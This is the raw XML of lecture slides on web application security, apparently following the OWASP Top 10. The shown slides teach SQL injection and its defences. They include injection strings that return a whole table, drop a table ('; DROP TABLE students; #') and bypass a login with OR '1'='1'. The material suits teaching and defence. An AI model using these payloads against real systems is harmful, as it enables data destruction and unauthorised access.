            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attacker has now successfully caused the entire table to be returned.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" b="1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359150" y="1311275"/>
            <a:ext cx="2133600" cy="457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-1" charset="0"/>
              <a:ea typeface="+mn-ea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390900" y="1358900"/>
            <a:ext cx="464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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>blah' OR 'x' = 'x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353784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A More Malicious Example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z="2400" smtClean="0"/>
              <a:t>What if the attacker had instead entered:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>; DROP TABLE students; #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>Results in the following SQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="622300" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM students WHERE studentid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>; DROP TABLE students; #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900" indent="-228600">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>Note how a MySQL comment (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>) consumes the final quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>Causes the entire table to be deleted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>Depends on knowledge of table name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>This is sometimes exposed to the user in debug code called during a database error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="850900">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>Use non-obvious table names, and never expose them to user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22531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000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Another example: Login Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419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33513"/>
            <a:ext cx="8382000" cy="4891087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr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Standard query to authenticate users:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812800" lvl="2" indent="0" defTabSz="449263">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE user='$username' AND passwd='$password’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>User authenticated if any records returned by this query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
            </a:pPr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Classic SQL injection attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Server side code sets variables $username and $password from user input to web form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="831850" lvl="1" indent="-323850" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Special strings can be entered by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812800" lvl="2" indent="0" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="2D2DB9"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>junk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>' AND passwd='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="2D2DB9"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>morejunk' OR '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
                <a:cs typeface="ヒラギノ角ゴ Pro W3" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="812800" lvl="2" indent="0" defTabSz="449263">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="ja-JP" sz="180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431800" indent="-323850" defTabSz="449263" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Result: access obtained without password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2286514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Defences against SQL injection (1)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Use provided functions for escaping strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Many attacks can be thwarted by simply using the SQL string escaping mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" charset="2"/>
              </a:rPr>
              <a:t> \’  and “  \”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>. with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>node.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1"/>
              <a:t>mysql.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1"/>
              <a:t>connection.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" err="1"/>
              <a:t>pool.escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>()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70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901</TotalTime>
  <Pages>4</Pages>
  <Words>1916</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>269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New Baltimore 8 00</vt:lpstr>
      <vt:lpstr>Security </vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A1: Injection Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection Attack</vt:lpstr>
      <vt:lpstr>An Example SQL Injection Attack</vt:lpstr>
      <vt:lpstr>A More Malicious Example</vt:lpstr>
      <vt:lpstr>Another example: Login Authentication</vt:lpstr>
      <vt:lpstr>Defences against SQL injection (1)</vt:lpstr>
      <vt:lpstr>Defences against SQL injection (2)</vt:lpstr>
      <vt:lpstr>Defences against SQL injection (3)</vt:lpstr>
      <vt:lpstr>A2: Broken Authentication &amp; Session Management</vt:lpstr>
      <vt:lpstr>Session Management</vt:lpstr>
      <vt:lpstr>Web authentication – failure/logging</vt:lpstr>
      <vt:lpstr>Web authentication – credentials</vt:lpstr>
      <vt:lpstr>A3: Sensitive data exposure</vt:lpstr>
      <vt:lpstr>A4: XML External Entity (XXE)</vt:lpstr>
      <vt:lpstr>XML External Entity – Examples (OWASP)</vt:lpstr>
      <vt:lpstr>A5: Broken access control</vt:lpstr>
      <vt:lpstr>A6: Security misconfiguration</vt:lpstr>
      <vt:lpstr>A7: Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Example</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Cookie Stealing XSS Attacks</vt:lpstr>
      <vt:lpstr>Protecting Cookies </vt:lpstr>
      <vt:lpstr>XSS using HTML only</vt:lpstr>
      <vt:lpstr>A8: Insecure Deserialization</vt:lpstr>
      <vt:lpstr>A9: Using components with known vulnerabilities </vt:lpstr>
      <vt:lpstr>A10: Insufficient Logging &amp; Monitoring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Essentials </dc:title>
  <dc:subject/>
  <dc:creator>Jimmy McGibney</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jimmy McGibney</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <cp:lastPrinted>2016-11-02T13:25:30Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-04T00:33:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-13T14:06:14Z</dcterms:modified>
</cp:coreProperties>
</file>